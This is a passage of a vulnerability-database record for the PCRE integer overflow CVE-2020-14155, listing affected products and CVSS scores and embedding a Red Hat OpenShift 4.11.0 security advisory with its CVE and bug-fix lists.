"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202006-0222",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"model": "gitlab",
"scope": "gte",
"trust": 1.0,
"vendor": "gitlab",
"version": "13.1.0"
},
{
"model": "gitlab",
"scope": "lt",
"trust": 1.0,
"vendor": "gitlab",
"version": "12.10.13"
},
{
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "pcre",
"scope": "lt",
"trust": 1.0,
"vendor": "pcre",
"version": "8.44"
},
{
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "communications cloud native core policy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.15.0"
},
{
"model": "gitlab",
"scope": "lt",
"trust": 1.0,
"vendor": "gitlab",
"version": "13.1.2"
},
{
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"model": "gitlab",
"scope": "lt",
"trust": 1.0,
"vendor": "gitlab",
"version": "13.0.8"
},
{
"model": "gitlab",
"scope": "gte",
"trust": 1.0,
"vendor": "gitlab",
"version": "13.0.0"
},
{
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.0.1"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "168042"
},
{
"db": "PACKETSTORM",
"id": "164825"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165129"
},
{
"db": "PACKETSTORM",
"id": "165096"
},
{
"db": "PACKETSTORM",
"id": "164927"
},
{
"db": "PACKETSTORM",
"id": "165862"
}
],
"trust": 0.8
},
"cve": "CVE-2020-14155",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-14155",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-167005",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2020-14155",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-14155",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202006-1036",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-167005",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-167005"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-1036"
},
{
"db": "NVD",
"id": "CVE-2020-14155"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring. PCRE is an open source regular expression library written in C language by Philip Hazel software developer. An input validation error vulnerability exists in libpcre in versions prior to PCRE 8.44. An attacker could exploit this vulnerability to execute arbitrary code or cause an application to crash on the system with a large number of requests. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: OpenShift Container Platform 4.11.0 bug fix and security update\nAdvisory ID: RHSA-2022:5069-01\nProduct: Red Hat OpenShift Enterprise\nAdvisory URL: https://access.redhat.com/errata/RHSA-2022:5069\nIssue date: 2022-08-10\nCVE Names: CVE-2018-25009 CVE-2018-25010 CVE-2018-25012\n CVE-2018-25013 CVE-2018-25014 CVE-2018-25032\n CVE-2019-5827 CVE-2019-13750 CVE-2019-13751\n CVE-2019-17594 CVE-2019-17595 CVE-2019-18218\n CVE-2019-19603 CVE-2019-20838 CVE-2020-13435\n CVE-2020-14155 CVE-2020-17541 CVE-2020-19131\n CVE-2020-24370 CVE-2020-28493 CVE-2020-35492\n CVE-2020-36330 CVE-2020-36331 CVE-2020-36332\n CVE-2021-3481 CVE-2021-3580 CVE-2021-3634\n CVE-2021-3672 CVE-2021-3695 CVE-2021-3696\n CVE-2021-3697 CVE-2021-3737 CVE-2021-4115\n CVE-2021-4156 CVE-2021-4189 CVE-2021-20095\n CVE-2021-20231 CVE-2021-20232 CVE-2021-23177\n CVE-2021-23566 CVE-2021-23648 CVE-2021-25219\n CVE-2021-31535 CVE-2021-31566 CVE-2021-36084\n CVE-2021-36085 CVE-2021-36086 CVE-2021-36087\n CVE-2021-38185 CVE-2021-38593 CVE-2021-40528\n CVE-2021-41190 CVE-2021-41617 CVE-2021-42771\n CVE-2021-43527 CVE-2021-43818 CVE-2021-44225\n CVE-2021-44906 CVE-2022-0235 CVE-2022-0778\n CVE-2022-1012 CVE-2022-1215 CVE-2022-1271\n CVE-2022-1292 CVE-2022-1586 CVE-2022-1621\n CVE-2022-1629 CVE-2022-1706 CVE-2022-1729\n CVE-2022-2068 CVE-2022-2097 CVE-2022-21698\n CVE-2022-22576 CVE-2022-23772 CVE-2022-23773\n CVE-2022-23806 CVE-2022-24407 CVE-2022-24675\n CVE-2022-24903 CVE-2022-24921 CVE-2022-25313\n CVE-2022-25314 CVE-2022-26691 CVE-2022-26945\n CVE-2022-27191 CVE-2022-27774 CVE-2022-27776\n CVE-2022-27782 CVE-2022-28327 CVE-2022-28733\n CVE-2022-28734 CVE-2022-28735 CVE-2022-28736\n CVE-2022-28737 CVE-2022-29162 CVE-2022-29810\n CVE-2022-29824 CVE-2022-30321 CVE-2022-30322\n CVE-2022-30323 CVE-2022-32250\n====================================================================\n1. Summary:\n\nRed Hat OpenShift Container Platform release 4.11.0 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.11. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.11.0. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHSA-2022:5068\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nSecurity Fix(es):\n\n* go-getter: command injection vulnerability (CVE-2022-26945)\n* go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)\n* go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)\n* go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)\n* nanoid: Information disclosure via valueOf() function (CVE-2021-23566)\n* sanitize-url: XSS (CVE-2021-23648)\n* minimist: prototype pollution (CVE-2021-44906)\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n* prometheus/client_golang: Denial of service using\nInstrumentHandlerCounter (CVE-2022-21698)\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n* go-getter: writes SSH credentials into logfile, exposing sensitive\ncredentials to local uses (CVE-2022-29810)\n* opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.11.0-x86_64\n\nThe image digest is\nsha256:300bce8246cf880e792e106607925de0a404484637627edf5f517375517d54a4\n\n(For aarch64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.11.0-aarch64\n\nThe image digest is\nsha256:29fa8419da2afdb64b5475d2b43dad8cc9205e566db3968c5738e7a91cf96dfe\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.11.0-s390x\n\nThe image digest is\nsha256:015d6180238b4024d11dfef6751143619a0458eccfb589f2058ceb1a6359dd46\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.11.0-ppc64le\n\nThe image digest is\nsha256:5052f8d5597c6656ca9b6bfd3de521504c79917aa80feb915d3c8546241f86ca\n\nAll OpenShift Container Platform 4.11 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.11 see the following documentation,\nwhich will be updated shortly for this release, for important instructions\non how to upgrade your cluster and fully apply this asynchronous errata\nupdate:\n\nhttps://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1817075 - MCC \u0026 MCO don\u0027t free leader leases during shut down -\u003e 10 minutes of leader election timeouts\n1822752 - cluster-version operator stops applying manifests when blocked by a precondition check\n1823143 - oc adm release extract --command, --tools doesn\u0027t pull from localregistry when given a localregistry/image\n1858418 - [OCPonRHV] OpenShift installer fails when Blank template is missing in oVirt/RHV\n1859153 - [AWS] An IAM error occurred occasionally during the installation phase: Invalid IAM Instance Profile name\n1896181 - [ovirt] install fails: due to terraform error \"Cannot run VM. VM is being updated\" on vm resource\n1898265 - [OCP 4.5][AWS] Installation failed: error updating LB Target Group\n1902307 - [vSphere] cloud labels management via cloud provider makes nodes not ready\n1905850 - `oc adm policy who-can` failed to check the `operatorcondition/status` resource\n1916279 - [OCPonRHV] Sometimes terraform installation fails on -failed to fetch Cluster(another terraform bug)\n1917898 - [ovirt] install fails: due to terraform error \"Tag not matched: expect \u003cfault\u003e but got \u003chtml\u003e\" on vm resource\n1918005 - [vsphere] If there are multiple port groups with the same name installation fails\n1918417 - IPv6 errors after exiting crictl\n1918690 - Should update the KCM resource-graph timely with the latest configure\n1919980 - oVirt installer fails due to terraform error \"Failed to wait for Templte(...) to become ok\"\n1921182 - InspectFailed: kubelet Failed to inspect image: rpc error: code = DeadlineExceeded desc = context deadline exceeded\n1923536 - Image pullthrough does not pass 429 errors back to capable clients\n1926975 - [aws-c2s] kube-apiserver crashloops due to missing cloud config\n1928932 - deploy/route_crd.yaml in openshift/router uses deprecated v1beta1 CRD API\n1932812 - Installer uses the terraform-provider in the Installer\u0027s directory if it exists\n1934304 - MemoryPressure Top Pod Consumers seems to be 2x expected value\n1943937 - CatalogSource incorrect parsing validation\n1944264 - [ovn] CNO should gracefully terminate OVN databases\n1944851 - List of ingress routes not cleaned up when routers no longer exist - take 2\n1945329 - In k8s 1.21 bump conntrack \u0027should drop INVALID conntrack entries\u0027 tests are disabled\n1948556 - Cannot read property \u0027apiGroup\u0027 of undefined error viewing operator CSV\n1949827 - Kubelet bound to incorrect IPs, referring to incorrect NICs in 4.5.x\n1957012 - Deleting the KubeDescheduler CR does not remove the corresponding deployment or configmap\n1957668 - oc login does not show link to console\n1958198 - authentication operator takes too long to pick up a configuration change\n1958512 - No 1.25 shown in REMOVEDINRELEASE for apis audited with k8s.io/removed-release 1.25 and k8s.io/deprecated true\n1961233 - Add CI test coverage for DNS availability during upgrades\n1961844 - baremetal ClusterOperator installed by CVO does not have relatedObjects\n1965468 - [OSP] Delete volume snapshots based on cluster ID in their metadata\n1965934 - can not get new result with \"Refresh off\" if click \"Run queries\" again\n1965969 - [aws] the public hosted zone id is not correct in the destroy log, while destroying a cluster which is using BYO private hosted zone. \n1968253 - GCP CSI driver can provision volume with access mode ROX\n1969794 - [OSP] Document how to use image registry PVC backend with custom availability zones\n1975543 - [OLM] Remove stale cruft installed by CVO in earlier releases\n1976111 - [tracker] multipathd.socket is missing start conditions\n1976782 - Openshift registry starts to segfault after S3 storage configuration\n1977100 - Pod failed to start with message \"set CPU load balancing: readdirent /proc/sys/kernel/sched_domain/cpu66/domain0: no such file or directory\"\n1978303 - KAS pod logs show: [SHOULD NOT HAPPEN] ...failed to convert new object...CertificateSigningRequest) to smd typed: .status.conditions: duplicate entries for key [type=\\\"Approved\\\"]\n1978798 - [Network Operator] Upgrade: The configuration to enable network policy ACL logging is missing on the cluster upgraded from 4.7-\u003e4.8\n1979671 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning\n1982737 - OLM does not warn on invalid CSV\n1983056 - IP conflict while recreating Pod with fixed name\n1984785 - LSO CSV does not contain disconnected annotation\n1989610 - Unsupported data types should not be rendered on operand details page\n1990125 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit\n1990384 - 502 error on \"Observe -\u003e Alerting\" UI after disabled local alertmanager\n1992553 - all the alert rules\u0027 annotations \"summary\" and \"description\" should comply with the OpenShift alerting guidelines\n1994117 - Some hardcodes are detected at the code level in orphaned code\n1994820 - machine controller doesn\u0027t send vCPU quota failed messages to cluster install logs\n1995953 - Ingresscontroller change the replicas to scaleup first time will be rolling update for all the ingress pods\n1996544 - AWS region ap-northeast-3 is missing in installer prompt\n1996638 - Helm operator manager container restart when CR is creating\u0026deleting\n1997120 - test_recreate_pod_in_namespace fails - Timed out waiting for namespace\n1997142 - OperatorHub: Filtering the OperatorHub catalog is extremely slow\n1997704 - [osp][octavia lb] given loadBalancerIP is ignored when creating a LoadBalancer type svc\n1999325 - FailedMount MountVolume.SetUp failed for volume \"kube-api-access\" : object \"openshift-kube-scheduler\"/\"kube-root-ca.crt\" not registered\n1999529 - Must gather fails to gather logs for all the namespace if server doesn\u0027t have volumesnapshotclasses resource\n1999891 - must-gather collects backup data even when Pods fails to be created\n2000653 - Add hypershift namespace to exclude namespaces list in descheduler configmap\n2002009 - IPI Baremetal, qemu-convert takes to long to save image into drive on slow/large disks\n2002602 - Storageclass creation page goes blank when \"Enable encryption\" is clicked if there is a syntax error in the configmap\n2002868 - Node exporter not able to scrape OVS metrics\n2005321 - Web Terminal is not opened on Stage of DevSandbox when terminal instance is not created yet\n2005694 - Removing proxy object takes up to 10 minutes for the changes to propagate to the MCO\n2006067 - Objects are not valid as a React child\n2006201 - ovirt-csi-driver-node pods are crashing intermittently\n2007246 - Openshift Container Platform - Ingress Controller does not set allowPrivilegeEscalation in the router deployment\n2007340 - Accessibility issues on topology - list view\n2007611 - TLS issues with the internal registry and AWS S3 bucket\n2007647 - oc adm release info --changes-from does not show changes in repos that squash-merge\n2008486 - Double scroll bar shows up on dragging the task quick search to the bottom\n2009345 - Overview page does not load from openshift console for some set of users after upgrading to 4.7.19\n2009352 - Add image-registry usage metrics to telemeter\n2009845 - Respect overrides changes during installation\n2010361 - OpenShift Alerting Rules Style-Guide Compliance\n2010364 - OpenShift Alerting Rules Style-Guide Compliance\n2010393 - [sig-arch][Late] clients should not use APIs that are removed in upcoming releases [Suite:openshift/conformance/parallel]\n2011525 - Rate-limit incoming BFD to prevent ovn-controller DoS\n2011895 - Details about cloud errors are missing from PV/PVC errors\n2012111 - LSO still try to find localvolumeset which is already deleted\n2012969 - need to figure out why osupdatedstart to reboot is zero seconds\n2013144 - Developer catalog category links could not be open in a new tab (sharing and open a deep link works fine)\n2013461 - Import deployment from Git with s2i expose always port 8080 (Service and Pod template, not Route) if another Route port is selected by the user\n2013734 - unable to label downloads route in openshift-console namespace\n2013822 - ensure that the `container-tools` content comes from the RHAOS plashets\n2014161 - PipelineRun logs are delayed and stuck on a high log volume\n2014240 - Image registry uses ICSPs only when source exactly matches image\n2014420 - Topology page is crashed\n2014640 - Cannot change storage class of boot disk when cloning from template\n2015023 - Operator objects are re-created even after deleting it\n2015042 - Adding a template from the catalog creates a secret that is not owned by the TemplateInstance\n2015356 - Different status shows on VM list page and details page\n2015375 - PVC creation for ODF/IBM Flashsystem shows incorrect types\n2015459 - [azure][openstack]When image registry configure an invalid proxy, registry pods are CrashLoopBackOff\n2015800 - [IBM]Shouldn\u0027t change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value\n2016425 - Adoption controller generating invalid metadata.Labels for an already adopted Subscription resource\n2016534 - externalIP does not work when egressIP is also present\n2017001 - Topology context menu for Serverless components always open downwards\n2018188 - VRRP ID conflict between keepalived-ipfailover and cluster VIPs\n2018517 - [sig-arch] events should not repeat pathologically expand_less failures - s390x CI\n2019532 - Logger object in LSO does not log source location accurately\n2019564 - User settings resources (ConfigMap, Role, RB) should be deleted when a user is deleted\n2020483 - Parameter $__auto_interval_period is in Period drop-down list\n2020622 - e2e-aws-upi and e2e-azure-upi jobs are not working\n2021041 - [vsphere] Not found TagCategory when destroying ipi cluster\n2021446 - openshift-ingress-canary is not reporting DEGRADED state, even though the canary route is not available and accessible\n2022253 - Web terminal view is broken\n2022507 - Pods stuck in OutOfpods state after running cluster-density\n2022611 - Remove BlockPools(no use case) and Object(redundat with Overview) tab on the storagesystem page for NooBaa only and remove BlockPools tab for External mode deployment\n2022745 - Cluster reader is not able to list NodeNetwork* objects\n2023295 - Must-gather tool gathering data from custom namespaces. \n2023691 - ClusterIP internalTrafficPolicy does not work for ovn-kubernetes\n2024427 - oc completion zsh doesn\u0027t auto complete\n2024708 - The form for creating operational CRs is badly rendering filed names (\"obsoleteCPUs\" -\u003e \"Obsolete CP Us\" )\n2024821 - [Azure-File-CSI] need more clear info when requesting pvc with volumeMode Block\n2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion\n2025624 - Ingress router metrics endpoint serving old certificates after certificate rotation\n2026356 - [IPI on Azure] The bootstrap machine type should be same as master\n2026461 - Completed pods in Openshift cluster not releasing IP addresses and results in err: range is full unless manually deleted\n2027603 - [UI] Dropdown doesn\u0027t close on it\u0027s own after arbiter zone selection on \u0027Capacity and nodes\u0027 page\n2027613 - Users can\u0027t silence alerts from the dev console\n2028493 - OVN-migration failed - ovnkube-node: error waiting for node readiness: timed out waiting for the condition\n2028532 - noobaa-pg-db-0 pod stuck in Init:0/2\n2028821 - Misspelled label in ODF management UI - MCG performance view\n2029438 - Bootstrap node cannot resolve api-int because NetworkManager replaces resolv.conf\n2029470 - Recover from suddenly appearing old operand revision WAS: kube-scheduler-operator test failure: Node\u0027s not achieving new revision\n2029797 - Uncaught exception: ResizeObserver loop limit exceeded\n2029835 - CSI migration for vSphere: Inline-volume tests failing\n2030034 - prometheusrules.openshift.io: dial tcp: lookup prometheus-operator.openshift-monitoring.svc on 172.30.0.10:53: no such host\n2030530 - VM created via customize wizard has single quotation marks surrounding its password\n2030733 - wrong IP selected to connect to the nodes when ExternalCloudProvider enabled\n2030776 - e2e-operator always uses quay master images during presubmit tests\n2032559 - CNO allows migration to dual-stack in unsupported configurations\n2032717 - Unable to download ignition after coreos-installer install --copy-network\n2032924 - PVs are not being cleaned up after PVC deletion\n2033482 - [vsphere] two variables in tf are undeclared and get warning message during installation\n2033575 - monitoring targets are down after the cluster run for more than 1 day\n2033711 - IBM VPC operator needs e2e csi tests for ibmcloud\n2033862 - MachineSet is not scaling up due to an OpenStack error trying to create multiple ports with the same MAC address\n2034147 - OpenShift VMware IPI Installation fails with Resource customization when corespersocket is unset and vCPU count is not a multiple of 4\n2034296 - Kubelet and Crio fails to start during upgrde to 4.7.37\n2034411 - [Egress Router] No NAT rules for ipv6 source and destination created in ip6tables-save\n2034688 - Allow Prometheus/Thanos to return 401 or 403 when the request isn\u0027t authenticated\n2034958 - [sig-network] Conntrack should be able to preserve UDP traffic when initial unready endpoints get ready\n2035005 - MCD is not always removing in progress taint after a successful update\n2035334 - [RFE] [OCPonRHV] Provision machines with preallocated disks\n2035899 - Operator-sdk run bundle doesn\u0027t support arm64 env\n2036202 - Bump podman to \u003e= 3.3.0 so that setup of multiple credentials for a single registry which can be distinguished by their path will work\n2036594 - [MAPO] Machine goes to failed state due to a momentary error of the cluster etcd\n2036948 - SR-IOV Network Device Plugin should handle offloaded VF instead of supporting only PF\n2037190 - dns operator status flaps between True/False/False and True/True/(False|True) after updating dnses.operator.openshift.io/default\n2037447 - Ingress Operator is not closing TCP connections. \n2037513 - I/O metrics from the Kubernetes/Compute Resources/Cluster Dashboard show as no datapoints found\n2037542 - Pipeline Builder footer is not sticky and yaml tab doesn\u0027t use full height\n2037610 - typo for the Terminated message from thanos-querier pod description info\n2037620 - Upgrade playbook should quit directly when trying to upgrade RHEL-7 workers to 4.10\n2037625 - AppliedClusterResourceQuotas can not be shown on project overview\n2037626 - unable to fetch ignition file when scaleup rhel worker nodes on cluster enabled Tang disk encryption\n2037628 - Add test id to kms flows for automation\n2037721 - PodDisruptionBudgetAtLimit alert fired in SNO cluster\n2037762 - Wrong ServiceMonitor definition is causing failure during Prometheus configuration reload and preventing changes from being applied\n2037841 - [RFE] use /dev/ptp_hyperv on Azure/AzureStack\n2038115 - Namespace and application bar is not sticky anymore\n2038244 - Import from git ignore the given servername and could not validate On-Premises GitHub and BitBucket installations\n2038405 - openshift-e2e-aws-workers-rhel-workflow in CI step registry broken\n2038774 - IBM-Cloud OVN IPsec fails, IKE UDP ports and ESP protocol not in security group\n2039135 - the error message is not clear when using \"opm index prune\" to prune a file-based index image\n2039161 - Note about token for encrypted PVCs should be removed when only cluster wide encryption checkbox is selected\n2039253 - ovnkube-node crashes on duplicate endpoints\n2039256 - Domain validation fails when TLD contains a digit. \n2039277 - Topology list view items are not highlighted on keyboard navigation\n2039462 - Application tab in User Preferences dropdown menus are too wide. \n2039477 - validation icon is missing from Import from git\n2039589 - The toolbox command always ignores [command] the first time\n2039647 - Some developer perspective links are not deep-linked causes developer to sometimes delete/modify resources in the wrong project\n2040180 - Bug when adding a new table panel to a dashboard for OCP UI with only one value column\n2040195 - Ignition fails to enable systemd units with backslash-escaped characters in their names\n2040277 - ThanosRuleNoEvaluationFor10Intervals alert description is wrong\n2040488 - OpenShift-Ansible BYOH Unit Tests are Broken\n2040635 - CPU Utilisation is negative number for \"Kubernetes / Compute Resources / Cluster\" dashboard\n2040654 - \u0027oc adm must-gather -- some_script\u0027 should exit with same non-zero code as the failed \u0027some_script\u0027 exits\n2040779 - Nodeport svc not accessible when the backend pod is on a window node\n2040933 - OCP 4.10 nightly build will fail to install if multiple NICs are defined on KVM nodes\n2041133 - \u0027oc explain route.status.ingress.conditions\u0027 shows type \u0027Currently only Ready\u0027 but actually is \u0027Admitted\u0027\n2041454 - Garbage values accepted for `--reference-policy` in `oc import-image` without any error\n2041616 - Ingress operator tries to manage DNS of additional ingresscontrollers that are not under clusters basedomain, which can\u0027t work\n2041769 - Pipeline Metrics page not showing data for normal user\n2041774 - Failing git detection should not recommend Devfiles as import strategy\n2041814 - The KubeletConfigController wrongly process multiple confs for a pool\n2041940 - Namespace pre-population not happening till a Pod is created\n2042027 - Incorrect feedback for \"oc label pods --all\"\n2042348 - Volume ID is missing in output message when expanding volume which is not mounted. \n2042446 - CSIWithOldVSphereHWVersion alert recurring despite upgrade to vmx-15\n2042501 - use lease for leader election\n2042587 - ocm-operator: Improve reconciliation of CA ConfigMaps\n2042652 - Unable to deploy hw-event-proxy operator\n2042838 - The status of container is not consistent on Container details and pod details page\n2042852 - Topology toolbars are unaligned to other toolbars\n2042999 - A pod cannot reach kubernetes.default.svc.cluster.local cluster IP\n2043035 - Wrong error code provided when request contains invalid argument\n2043068 - \u003cx\u003e available of \u003cy\u003e text disappears in Utilization item if x is 0\n2043080 - openshift-installer intermittent failure on AWS with Error: InvalidVpcID.NotFound: The vpc ID \u0027vpc-123456789\u0027 does not exist\n2043094 - ovnkube-node not deleting stale conntrack entries when endpoints go away\n2043118 - Host should transition through Preparing when HostFirmwareSettings changed\n2043132 - Add a metric when vsphere csi storageclass creation fails\n2043314 - `oc debug node` does not meet compliance requirement\n2043336 - Creating multi SriovNetworkNodePolicy cause the worker always be draining\n2043428 - Address Alibaba CSI driver operator review comments\n2043533 - Update ironic, inspector, and ironic-python-agent to latest bugfix release\n2043672 - [MAPO] root volumes not working\n2044140 - When \u0027oc adm upgrade --to-image ...\u0027 rejects an update as not recommended, it should mention --allow-explicit-upgrade\n2044207 - [KMS] The data in the text box does not get cleared on switching the authentication method\n2044227 - Test Managed cluster should only include cluster daemonsets that have maxUnavailable update of 10 or 33 percent fails\n2044412 - Topology list misses separator lines and hover effect let the list jump 1px\n2044421 - Topology list does not allow selecting an application group anymore\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2044803 - Unify button text style on VM tabs\n2044824 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]\n2045065 - Scheduled pod has nodeName changed\n2045073 - Bump golang and build images for local-storage-operator\n2045087 - Failed to apply sriov policy on intel nics\n2045551 - Remove enabled FeatureGates from TechPreviewNoUpgrade\n2045559 - API_VIP moved when kube-api container on another master node was stopped\n2045577 - [ocp 4.9 | ovn-kubernetes] ovsdb_idl|WARN|transaction error: {\"details\":\"cannot delete Datapath_Binding row 29e48972-xxxx because of 2 remaining 